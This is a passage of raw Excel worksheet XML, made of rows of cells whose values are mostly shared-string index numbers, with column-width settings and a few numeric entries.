        <v>836</v>
      </c>
      <c r="B363" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C363" s="17" t="s">
        <v>84</v>
      </c>
      <c r="D363" s="17" t="s">
        <v>1025</v>
      </c>
      <c r="E363" s="17" t="s">
        <v>1026</v>
      </c>
      <c r="F363" s="17" t="s">
        <v>1027</v>
      </c>
      <c r="G363" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H363" s="17" t="s">
        <v>822</v>
      </c>
      <c r="I363" s="17" t="s">
        <v>837</v>
      </c>
      <c r="J363" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K363" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L363" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M363" s="17">
        <v>1</v>
      </c>
      <c r="N363" s="17" t="s">
        <v>797</v>
      </c>
      <c r="O363" s="17" t="s">
        <v>1028</v>
      </c>
    </row>
    <row r="364" spans="1:15">
      <c r="A364" s="17" t="s">
        <v>903</v>
      </c>
      <c r="B364" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C364" s="17" t="s">
        <v>84</v>
      </c>
      <c r="D364" s="17" t="s">
        <v>1025</v>
      </c>
      <c r="E364" s="17" t="s">
        <v>1026</v>
      </c>
      <c r="F364" s="17" t="s">
        <v>1027</v>
      </c>
      <c r="G364" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H364" s="17" t="s">
        <v>822</v>
      </c>
      <c r="I364" s="17" t="s">
        <v>904</v>
      </c>
      <c r="J364" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K364" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L364" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M364" s="17">
        <v>1</v>
      </c>
      <c r="N364" s="17" t="s">
        <v>797</v>
      </c>
      <c r="O364" s="17" t="s">
        <v>1028</v>
      </c>
    </row>
    <row r="365" spans="1:15">
      <c r="A365" s="17" t="s">
        <v>905</v>
      </c>
      <c r="B365" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C365" s="17" t="s">
        <v>84</v>
      </c>
      <c r="D365" s="17" t="s">
        <v>1025</v>
      </c>
      <c r="E365" s="17" t="s">
        <v>1026</v>
      </c>
      <c r="F365" s="17" t="s">
        <v>1027</v>
      </c>
      <c r="G365" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H365" s="17" t="s">
        <v>822</v>
      </c>
      <c r="I365" s="17" t="s">
        <v>906</v>
      </c>
      <c r="J365" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K365" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L365" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M365" s="17">
        <v>1</v>
      </c>
      <c r="N365" s="17" t="s">
        <v>797</v>
      </c>
      <c r="O365" s="17" t="s">
        <v>1028</v>
      </c>
    </row>
    <row r="366" spans="1:15">
      <c r="A366" s="17" t="s">
        <v>970</v>
      </c>
      <c r="B366" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C366" s="17" t="s">
        <v>84</v>
      </c>
      <c r="D366" s="17" t="s">
        <v>1025</v>
      </c>
      <c r="E366" s="17" t="s">
        <v>1026</v>
      </c>
      <c r="F366" s="17" t="s">
        <v>1027</v>
      </c>
      <c r="G366" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H366" s="17" t="s">
        <v>822</v>
      </c>
      <c r="I366" s="17" t="s">
        <v>971</v>
      </c>
      <c r="J366" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K366" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L366" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M366" s="17">
        <v>1</v>
      </c>
      <c r="N366" s="17" t="s">
        <v>797</v>
      </c>
      <c r="O366" s="17" t="s">
        <v>1028</v>
      </c>
    </row>
    <row r="367" spans="1:15">
      <c r="A367" s="17" t="s">
        <v>901</v>
      </c>
      <c r="B367" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C367" s="17" t="s">
        <v>84</v>
      </c>
      <c r="D367" s="17" t="s">
        <v>1025</v>
      </c>
      <c r="E367" s="17" t="s">
        <v>1026</v>
      </c>
      <c r="F367" s="17" t="s">
        <v>1027</v>
      </c>
      <c r="G367" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H367" s="17" t="s">
        <v>822</v>
      </c>
      <c r="I367" s="17" t="s">
        <v>902</v>
      </c>
      <c r="J367" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K367" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L367" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M367" s="17">
        <v>1</v>
      </c>
      <c r="N367" s="17" t="s">
        <v>797</v>
      </c>
      <c r="O367" s="17" t="s">
        <v>1028</v>
      </c>
    </row>
    <row r="368" spans="1:15">
      <c r="A368" s="17" t="s">
        <v>836</v>
      </c>
      <c r="B368" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C368" s="17" t="s">
        <v>84</v>
      </c>
      <c r="D368" s="17" t="s">
        <v>1025</v>
      </c>
      <c r="E368" s="17" t="s">
        <v>1026</v>
      </c>
      <c r="F368" s="17" t="s">
        <v>1027</v>
      </c>
      <c r="G368" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H368" s="17" t="s">
        <v>822</v>
      </c>
      <c r="I368" s="17" t="s">
        <v>837</v>
      </c>
      <c r="J368" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K368" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L368" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M368" s="17">
        <v>1</v>
      </c>
      <c r="N368" s="17" t="s">
        <v>797</v>
      </c>
      <c r="O368" s="17" t="s">
        <v>1028</v>
      </c>
    </row>
    <row r="369" spans="1:15">
      <c r="A369" s="17" t="s">
        <v>903</v>
      </c>
      <c r="B369" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C369" s="17" t="s">
        <v>84</v>
      </c>
      <c r="D369" s="17" t="s">
        <v>1025</v>
      </c>
      <c r="E369" s="17" t="s">
        <v>1026</v>
      </c>
      <c r="F369" s="17" t="s">
        <v>1027</v>
      </c>
      <c r="G369" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H369" s="17" t="s">
        <v>822</v>
      </c>
      <c r="I369" s="17" t="s">
        <v>904</v>
      </c>
      <c r="J369" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K369" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L369" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M369" s="17">
        <v>1</v>
      </c>
      <c r="N369" s="17" t="s">
        <v>797</v>
      </c>
      <c r="O369" s="17" t="s">
        <v>1028</v>
      </c>
    </row>
    <row r="370" spans="1:15">
      <c r="A370" s="17" t="s">
        <v>905</v>
      </c>
      <c r="B370" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C370" s="17" t="s">
        <v>84</v>
      </c>
      <c r="D370" s="17" t="s">
        <v>1025</v>
      </c>
      <c r="E370" s="17" t="s">
        <v>1026</v>
      </c>
      <c r="F370" s="17" t="s">
        <v>1027</v>
      </c>
      <c r="G370" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H370" s="17" t="s">
        <v>822</v>
      </c>
      <c r="I370" s="17" t="s">
        <v>906</v>
      </c>
      <c r="J370" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K370" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L370" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M370" s="17">
        <v>1</v>
      </c>
      <c r="N370" s="17" t="s">
        <v>797</v>
      </c>
      <c r="O370" s="17" t="s">
        <v>1028</v>
      </c>
    </row>
    <row r="371" spans="1:15">
      <c r="A371" s="17" t="s">
        <v>970</v>
      </c>
      <c r="B371" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C371" s="17" t="s">
        <v>84</v>
      </c>
      <c r="D371" s="17" t="s">
        <v>1025</v>
      </c>
      <c r="E371" s="17" t="s">
        <v>1026</v>
      </c>
      <c r="F371" s="17" t="s">
        <v>1027</v>
      </c>
      <c r="G371" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H371" s="17" t="s">
        <v>822</v>
      </c>
      <c r="I371" s="17" t="s">
        <v>971</v>
      </c>
      <c r="J371" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K371" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L371" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M371" s="17">
        <v>1</v>
      </c>
      <c r="N371" s="17" t="s">
        <v>797</v>
      </c>
      <c r="O371" s="17" t="s">
        <v>1028</v>
      </c>
    </row>
    <row r="372" spans="1:15">
      <c r="A372" s="17" t="s">
        <v>1029</v>
      </c>
      <c r="B372" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C372" s="17" t="s">
        <v>90</v>
      </c>
      <c r="D372" s="17" t="s">
        <v>91</v>
      </c>
      <c r="E372" s="17" t="s">
        <v>1030</v>
      </c>
      <c r="F372" s="17" t="s">
        <v>1031</v>
      </c>
      <c r="G372" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H372" s="17" t="s">
        <v>952</v>
      </c>
      <c r="I372" s="17" t="s">
        <v>1032</v>
      </c>
      <c r="J372" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K372" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L372" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M372" s="17">
        <v>4104</v>
      </c>
      <c r="N372" s="17" t="s">
        <v>803</v>
      </c>
      <c r="O372" s="17" t="s">
        <v>1033</v>
      </c>
    </row>
    <row r="373" spans="1:15">
      <c r="A373" s="17" t="s">
        <v>1034</v>
      </c>
      <c r="B373" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C373" s="17" t="s">
        <v>90</v>
      </c>
      <c r="D373" s="17" t="s">
        <v>91</v>
      </c>
      <c r="E373" s="17" t="s">
        <v>1030</v>
      </c>
      <c r="F373" s="17" t="s">
        <v>1031</v>
      </c>
      <c r="G373" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H373" s="17" t="s">
        <v>952</v>
      </c>
      <c r="I373" s="17" t="s">
        <v>1035</v>
      </c>
      <c r="J373" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K373" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L373" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M373" s="17">
        <v>4104</v>
      </c>
      <c r="N373" s="17" t="s">
        <v>803</v>
      </c>
      <c r="O373" s="17" t="s">
        <v>1033</v>
      </c>
    </row>
    <row r="374" spans="1:15">
      <c r="A374" s="17" t="s">
        <v>983</v>
      </c>
      <c r="B374" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C374" s="17" t="s">
        <v>90</v>
      </c>
      <c r="D374" s="17" t="s">
        <v>91</v>
      </c>
      <c r="E374" s="17" t="s">
        <v>1030</v>
      </c>
      <c r="F374" s="17" t="s">
        <v>1031</v>
      </c>
      <c r="G374" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H374" s="17" t="s">
        <v>952</v>
      </c>
      <c r="I374" s="17" t="s">
        <v>986</v>
      </c>
      <c r="J374" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K374" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L374" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M374" s="17">
        <v>4104</v>
      </c>
      <c r="N374" s="17" t="s">
        <v>803</v>
      </c>
      <c r="O374" s="17" t="s">
        <v>1033</v>
      </c>
    </row>
    <row r="375" spans="1:15">
      <c r="A375" s="17" t="s">
        <v>1036</v>
      </c>
      <c r="B375" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C375" s="17" t="s">
        <v>90</v>
      </c>
      <c r="D375" s="17" t="s">
        <v>91</v>
      </c>
      <c r="E375" s="17" t="s">
        <v>1030</v>
      </c>
      <c r="F375" s="17" t="s">
        <v>1031</v>
      </c>
      <c r="G375" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H375" s="17" t="s">
        <v>952</v>
      </c>
      <c r="I375" s="17" t="s">
        <v>1037</v>
      </c>
      <c r="J375" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K375" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L375" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M375" s="17">
        <v>4104</v>
      </c>
      <c r="N375" s="17" t="s">
        <v>803</v>
      </c>
      <c r="O375" s="17" t="s">
        <v>1033</v>
      </c>
    </row>
    <row r="376" spans="1:15">
      <c r="A376" s="17" t="s">
        <v>988</v>
      </c>
      <c r="B376" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C376" s="17" t="s">
        <v>97</v>
      </c>
      <c r="D376" s="17" t="s">
        <v>98</v>
      </c>
      <c r="E376" s="17" t="s">
        <v>633</v>
      </c>
      <c r="F376" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="G376" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H376" s="17" t="s">
        <v>952</v>
      </c>
      <c r="I376" s="17" t="s">
        <v>990</v>
      </c>
      <c r="J376" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K376" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L376" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M376" s="17">
        <v>4104</v>
      </c>
      <c r="N376" s="17" t="s">
        <v>803</v>
      </c>
      <c r="O376" s="17" t="s">
        <v>1039</v>
      </c>
    </row>
    <row r="377" spans="1:15">
      <c r="A377" s="17" t="s">
        <v>1001</v>
      </c>
      <c r="B377" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C377" s="17" t="s">
        <v>31</v>
      </c>
      <c r="D377" s="17" t="s">
        <v>1040</v>
      </c>
      <c r="E377" s="17" t="s">
        <v>1041</v>
      </c>
      <c r="F377" s="17" t="s">
        <v>1042</v>
      </c>
      <c r="G377" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H377" s="17" t="s">
        <v>822</v>
      </c>
      <c r="I377" s="17" t="s">
        <v>1005</v>
      </c>
      <c r="J377" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K377" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L377" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M377" s="17">
        <v>3</v>
      </c>
      <c r="N377" s="17" t="s">
        <v>798</v>
      </c>
      <c r="O377" s="17" t="s">
        <v>1043</v>
      </c>
    </row>
    <row r="378" spans="1:15">
      <c r="A378" s="17" t="s">
        <v>1001</v>
      </c>
      <c r="B378" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C378" s="17" t="s">
        <v>31</v>
      </c>
      <c r="D378" s="17" t="s">
        <v>1040</v>
      </c>
      <c r="E378" s="17" t="s">
        <v>1041</v>
      </c>
      <c r="F378" s="17" t="s">
        <v>1042</v>
      </c>
      <c r="G378" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H378" s="17" t="s">
        <v>822</v>
      </c>
      <c r="I378" s="17" t="s">
        <v>1005</v>
      </c>
      <c r="J378" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K378" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L378" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M378" s="17">
        <v>3</v>
      </c>
      <c r="N378" s="17" t="s">
        <v>798</v>
      </c>
      <c r="O378" s="17" t="s">
        <v>1043</v>
      </c>
    </row>
    <row r="379" spans="1:15">
      <c r="A379" s="17" t="s">
        <v>1001</v>
      </c>
      <c r="B379" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C379" s="17" t="s">
        <v>31</v>
      </c>
      <c r="D379" s="17" t="s">
        <v>1040</v>
      </c>
      <c r="E379" s="17" t="s">
        <v>1041</v>
      </c>
      <c r="F379" s="17" t="s">
        <v>1042</v>
      </c>
      <c r="G379" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H379" s="17" t="s">
        <v>822</v>
      </c>
      <c r="I379" s="17" t="s">
        <v>1005</v>
      </c>
      <c r="J379" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K379" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L379" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M379" s="17">
        <v>3</v>
      </c>
      <c r="N379" s="17" t="s">
        <v>798</v>
      </c>
      <c r="O379" s="17" t="s">
        <v>1043</v>
      </c>
    </row>
    <row r="380" spans="1:15">
      <c r="A380" s="17" t="s">
        <v>1001</v>
      </c>
      <c r="B380" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C380" s="17" t="s">
        <v>31</v>
      </c>
      <c r="D380" s="17" t="s">
        <v>1040</v>
      </c>
      <c r="E380" s="17" t="s">
        <v>1041</v>
      </c>
      <c r="F380" s="17" t="s">
        <v>1042</v>
      </c>
      <c r="G380" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H380" s="17" t="s">
        <v>822</v>
      </c>
      <c r="I380" s="17" t="s">
        <v>1005</v>
      </c>
      <c r="J380" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K380" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L380" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M380" s="17">
        <v>3</v>
      </c>
      <c r="N380" s="17" t="s">
        <v>798</v>
      </c>
      <c r="O380" s="17" t="s">
        <v>1043</v>
      </c>
    </row>
    <row r="381" spans="1:15">
      <c r="A381" s="17" t="s">
        <v>849</v>
      </c>
      <c r="B381" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C381" s="17" t="s">
        <v>31</v>
      </c>
      <c r="D381" s="17" t="s">
        <v>1044</v>
      </c>
      <c r="E381" s="17" t="s">
        <v>1045</v>
      </c>
      <c r="F381" s="17" t="s">
        <v>1046</v>
      </c>
      <c r="G381" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H381" s="17" t="s">
        <v>822</v>
      </c>
      <c r="I381" s="17" t="s">
        <v>850</v>
      </c>
      <c r="J381" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K381" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L381" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M381" s="17">
        <v>1</v>
      </c>
      <c r="N381" s="17" t="s">
        <v>797</v>
      </c>
      <c r="O381" s="17" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="382" spans="1:15">
      <c r="A382" s="17" t="s">
        <v>849</v>
      </c>
      <c r="B382" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C382" s="17" t="s">
        <v>31</v>
      </c>
      <c r="D382" s="17" t="s">
        <v>1044</v>
      </c>
      <c r="E382" s="17" t="s">
        <v>1045</v>
      </c>
      <c r="F382" s="17" t="s">
        <v>1046</v>
      </c>
      <c r="G382" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H382" s="17" t="s">
        <v>822</v>
      </c>
      <c r="I382" s="17" t="s">
        <v>850</v>
      </c>
      <c r="J382" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K382" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L382" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M382" s="17">
        <v>1</v>
      </c>
      <c r="N382" s="17" t="s">
        <v>797</v>
      </c>
      <c r="O382" s="17" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="383" spans="1:15">
      <c r="A383" s="17" t="s">
        <v>1048</v>
      </c>
      <c r="B383" s="17" t="s">
        <v>447</v>
      </c>
      <c r="C383" s="17" t="s">
        <v>31</v>
      </c>
      <c r="D383" s="17" t="s">
        <v>995</v>
      </c>
      <c r="E383" s="17" t="s">
        <v>1049</v>
      </c>
      <c r="F383" s="17" t="s">
        <v>1050</v>
      </c>
      <c r="G383" s="17" t="s">
        <v>821</v>
      </c>
      <c r="H383" s="17" t="s">
        <v>952</v>
      </c>
      <c r="I383" s="17" t="s">
        <v>1051</v>
      </c>
      <c r="J383" s="17" t="s">
        <v>824</v>
      </c>
      <c r="K383" s="17" t="s">
        <v>825</v>
      </c>
      <c r="L383" s="17" t="s">
        <v>826</v>
      </c>
      <c r="M383" s="17">
        <v>4104</v>
      </c>
      <c r="N383" s="17" t="s">
        <v>803</v>
      </c>
      <c r="O383" s="17" t="s">
        <v>1052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3" customWidth="1"/>
    <col min="2" max="2" width="42.625" style="13" customWidth="1"/>
    <col min="3" max="3" width="18.625" style="13" customWidth="1"/>
    <col min="4" max="5" width="22.625" style="13" customWidth="1"/>
    <col min="6" max="6" width="12.625" style="13" customWidth="1"/>
    <col min="7" max="11" width="18.625" style="13" customWidth="1"/>
    <col min="12" max="12" width="42.625" style="13" customWidth="1"/>
    <col min="13" max="16384" width="11" style="13"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" ht="27.95" customHeight="1">
      <c r="A1" s="14" t="s">
        <v>1053</v>
      </c>
    </row>
    <row r="2" spans="1:12" ht="36" customHeight="1">
      <c r="A2" s="15" t="s">
        <v>1054</v>
      </c>
    </row>
    <row r="4" spans="1:12">
      <c r="A4" s="16" t="s">
        <v>1055</v>
      </c>
      <c r="B4" s="16" t="s">
        <v>1056</v>
      </c>
      <c r="C4" s="16" t="s">
        <v>1057</v>
      </c>
      <c r="D4" s="16" t="s">
        <v>733</v>
      </c>
      <c r="E4" s="16" t="s">
        <v>734</v>
      </c>
      <c r="F4" s="16" t="s">
        <v>735</v>
      </c>
      <c r="G4" s="16" t="s">
        <v>1058</v>
      </c>
      <c r="H4" s="16" t="s">
        <v>1059</v>
      </c>
      <c r="I4" s="16" t="s">
        <v>1060</v>
      </c>
      <c r="J4" s="16" t="s">
        <v>1061</v>
      </c>
      <c r="K4" s="16" t="s">
        <v>1062</v>
      </c>
      <c r="L4" s="16" t="s">
        <v>746</v>
      </c>
    </row>
    <row r="5" spans="1:12">
      <c r="A5" s="17" t="s">
        <v>1063</v>
      </c>
      <c r="B5" s="17" t="s">
        <v>1064</v>
      </c>
      <c r="C5" s="17" t="s">
        <v>714</v>
      </c>
      <c r="D5" s="17" t="s">
        <v>1065</v>
      </c>
      <c r="E5" s="17" t="s">
        <v>1066</v>
      </c>
      <c r="F5" s="17">
        <v>0.7</v>
      </c>
      <c r="G5" s="17" t="s">
        <v>1067</v>
      </c>
      <c r="H5" s="17" t="s">
        <v>1068</v>
      </c>
      <c r="I5" s="17"/>
      <c r="J5" s="17"/>
      <c r="K5" s="17" t="s">
        <v>1069</v>
      </c>
      <c r="L5" s="17" t="s">
        <v>1070</v>
      </c>
    </row>
    <row r="6" spans="1:12">
      <c r="A6" s="17" t="s">
        <v>1071</v>
      </c>
      <c r="B6" s="17" t="s">
        <v>1072</v>
      </c>
      <c r="C6" s="17" t="s">
        <v>714</v>
      </c>
      <c r="D6" s="17" t="s">
        <v>1073</v>
      </c>
      <c r="E6" s="17" t="s">
        <v>1074</v>
      </c>
      <c r="F6" s="17">
        <v>0.31</v>
      </c>
      <c r="G6" s="17"/>
      <c r="H6" s="17" t="s">
        <v>1068</v>
      </c>
      <c r="I6" s="17"/>
      <c r="J6" s="17"/>
      <c r="K6" s="17" t="s">
        <v>1069</v>
      </c>
      <c r="L6" s="17" t="s">
        <v>1075</v>
      </c>
    </row>
    <row r="7" spans="1:12">
      <c r="A7" s="17" t="s">
        <v>1076</v>
      </c>
      <c r="B7" s="17" t="s">
        <v>1077</v>
      </c>
      <c r="C7" s="17" t="s">
        <v>714</v>
      </c>
      <c r="D7" s="17" t="s">
        <v>1078</v>
      </c>
      <c r="E7" s="17" t="s">
        <v>1079</v>
      </c>
      <c r="F7" s="17">
        <v>2.89</v>
      </c>
      <c r="G7" s="17" t="s">
        <v>1080</v>
      </c>
      <c r="H7" s="17" t="s">
        <v>1068</v>
      </c>
      <c r="I7" s="17"/>
      <c r="J7" s="17"/>
      <c r="K7" s="17" t="s">
        <v>1069</v>
      </c>
      <c r="L7" s="17" t="s">
        <v>1081</v>
      </c>
    </row>
    <row r="8" spans="1:12">
      <c r="A8" s="17" t="s">
        <v>1082</v>
      </c>
      <c r="B8" s="17" t="s">
        <v>1083</v>
      </c>
      <c r="C8" s="17" t="s">
        <v>714</v>
      </c>
      <c r="D8" s="17" t="s">
        <v>1084</v>
      </c>
      <c r="E8" s="17" t="s">
        <v>1085</v>
      </c>
      <c r="F8" s="17">
        <v>0.03</v>
      </c>
      <c r="G8" s="17"/>
      <c r="H8" s="17" t="s">
        <v>1068</v>
      </c>
      <c r="I8" s="17"/>
      <c r="J8" s="17"/>
      <c r="K8" s="17" t="s">
        <v>1069</v>
      </c>
      <c r="L8" s="17" t="s">
        <v>1086</v>
      </c>
    </row>
    <row r="9" spans="1:12">
      <c r="A9" s="17" t="s">
        <v>1087</v>
      </c>
      <c r="B9" s="17" t="s">
        <v>1088</v>
      </c>
      <c r="C9" s="17" t="s">
        <v>714</v>
      </c>
      <c r="D9" s="17" t="s">
        <v>1089</v>
      </c>
      <c r="E9" s="17" t="s">
        <v>1090</v>
      </c>
      <c r="F9" s="17">
        <v>0.64</v>
      </c>
      <c r="G9" s="17"/>
      <c r="H9" s="17" t="s">
        <v>1068</v>
      </c>
      <c r="I9" s="17"/>
      <c r="J9" s="17"/>
      <c r="K9" s="17" t="s">
        <v>1069</v>
      </c>
      <c r="L9" s="17" t="s">
        <v>1091</v>
      </c>
    </row>
    <row r="10" spans="1:12">
      <c r="A10" s="17" t="s">
        <v>1092</v>
      </c>
      <c r="B10" s="17" t="s">
        <v>1093</v>
      </c>
      <c r="C10" s="17" t="s">
        <v>714</v>
      </c>
      <c r="D10" s="17" t="s">
        <v>1094</v>
      </c>
      <c r="E10" s="17" t="s">
        <v>1095</v>
      </c>
      <c r="F10" s="17">
        <v>1.4</v>
      </c>
      <c r="G10" s="17"/>
      <c r="H10" s="17" t="s">
        <v>1068</v>
      </c>
      <c r="I10" s="17"/>
      <c r="J10" s="17"/>
      <c r="K10" s="17" t="s">
        <v>1069</v>
      </c>
      <c r="L10" s="17" t="s">
        <v>1096</v>
      </c>
    </row>
    <row r="11" spans="1:12">
      <c r="A11" s="17" t="s">
        <v>1097</v>
      </c>
      <c r="B11" s="17" t="s">
        <v>1098</v>
      </c>
      <c r="C11" s="17" t="s">
        <v>714</v>
      </c>
      <c r="D11" s="17" t="s">
        <v>1099</v>
      </c>
      <c r="E11" s="17" t="s">
        <v>1100</v>
      </c>
      <c r="F11" s="17">
        <v>2.3199999999999998</v>
      </c>
      <c r="G11" s="17" t="s">
        <v>1101</v>
      </c>
      <c r="H11" s="17" t="s">
        <v>1068</v>
      </c>
      <c r="I11" s="17"/>
      <c r="J11" s="17"/>
      <c r="K11" s="17" t="s">
        <v>1069</v>
      </c>
      <c r="L11" s="17" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="12" spans="1:12">
      <c r="A12" s="17" t="s">
        <v>1103</v>
      </c>
      <c r="B12" s="17" t="s">
        <v>1104</v>
      </c>
      <c r="C12" s="17" t="s">
        <v>714</v>
      </c>
      <c r="D12" s="17" t="s">
        <v>1105</v>
      </c>
      <c r="E12" s="17" t="s">
        <v>1106</v>
      </c>
      <c r="F12" s="17">
        <v>0.66</v>
      </c>
      <c r="G12" s="17" t="s">
        <v>1107</v>
      </c>
      <c r="H12" s="17" t="s">
        <v>1068</v>
      </c>
      <c r="I12" s="17"/>
      <c r="J12" s="17"/>
      <c r="K12" s="17" t="s">
        <v>1069</v>
      </c>
      <c r="L12" s="17" t="s">
        <v>1108</v>
      </c>
    </row>
    <row r="13" spans="1:12">
      <c r="A13" s="17" t="s">
        <v>1109</v>
      </c>
      <c r="B13" s="17" t="s">
        <v>1110</v>
      </c>
      <c r="C13" s="17" t="s">
        <v>714</v>
      </c>
      <c r="D13" s="17" t="s">
        <v>1111</v>
      </c>
      <c r="E13" s="17" t="s">
        <v>1112</v>
      </c>
      <c r="F13" s="17">
        <v>3.56</v>
      </c>
      <c r="G13" s="17"/>
      <c r="H13" s="17" t="s">
        <v>1068</v>
      </c>
      <c r="I13" s="17"/>
      <c r="J13" s="17"/>
      <c r="K13" s="17" t="s">
        <v>1069</v>
      </c>
      <c r="L13" s="17" t="s">
        <v>1113</v>
      </c>
    </row>
    <row r="14" spans="1:12">
      <c r="A14" s="17" t="s">
        <v>1114</v>
      </c>
      <c r="B14" s="17" t="s">
        <v>1115</v>
      </c>
      <c r="C14" s="17" t="s">
        <v>714</v>
      </c>
      <c r="D14" s="17" t="s">
        <v>1116</v>
      </c>
      <c r="E14" s="17" t="s">
        <v>1117</v>
      </c>
      <c r="F14" s="17">
        <v>0.25</v>
      </c>
      <c r="G14" s="17" t="s">
        <v>1118</v>
      </c>
      <c r="H14" s="17" t="s">
        <v>1068</v>
      </c>
      <c r="I14" s="17"/>
      <c r="J14" s="17"/>
      <c r="K14" s="17" t="s">
        <v>1069</v>
      </c>
      <c r="L14" s="17" t="s">
        <v>1119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3" customWidth="1"/>
    <col min="11" max="11" width="42.625" style="13" customWidth="1"/>
    <col min="12" max="14" width="18.625" style="13" customWidth="1"/>
    <col min="15" max="16384" width="11" style="13"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:14" ht="27.95" customHeight="1">
      <c r="A1" s="14" t="s">
        <v>1120</v>
      </c>
    </row>
    <row r="2" spans="1:14" ht="36" customHeight="1">
      <c r="A2" s="15" t="s">
        <v>3417</v>
      </c>
    </row>
    <row r="4" spans="1:14">
      <c r="A4" s="16" t="s">
        <v>1121</v>
      </c>
      <c r="B4" s="16" t="s">
        <v>1122</v>
      </c>
      <c r="C4" s="16" t="s">
        <v>1123</v>
      </c>
      <c r="D4" s="16" t="s">
        <v>1124</v>
      </c>
      <c r="E4" s="16" t="s">
        <v>1055</v>
      </c>
      <c r="F4" s="16" t="s">
        <v>1125</v>
      </c>
      <c r="G4" s="16" t="s">
        <v>34</v>
      </c>
      <c r="H4" s="16" t="s">
        <v>1126</v>
      </c>
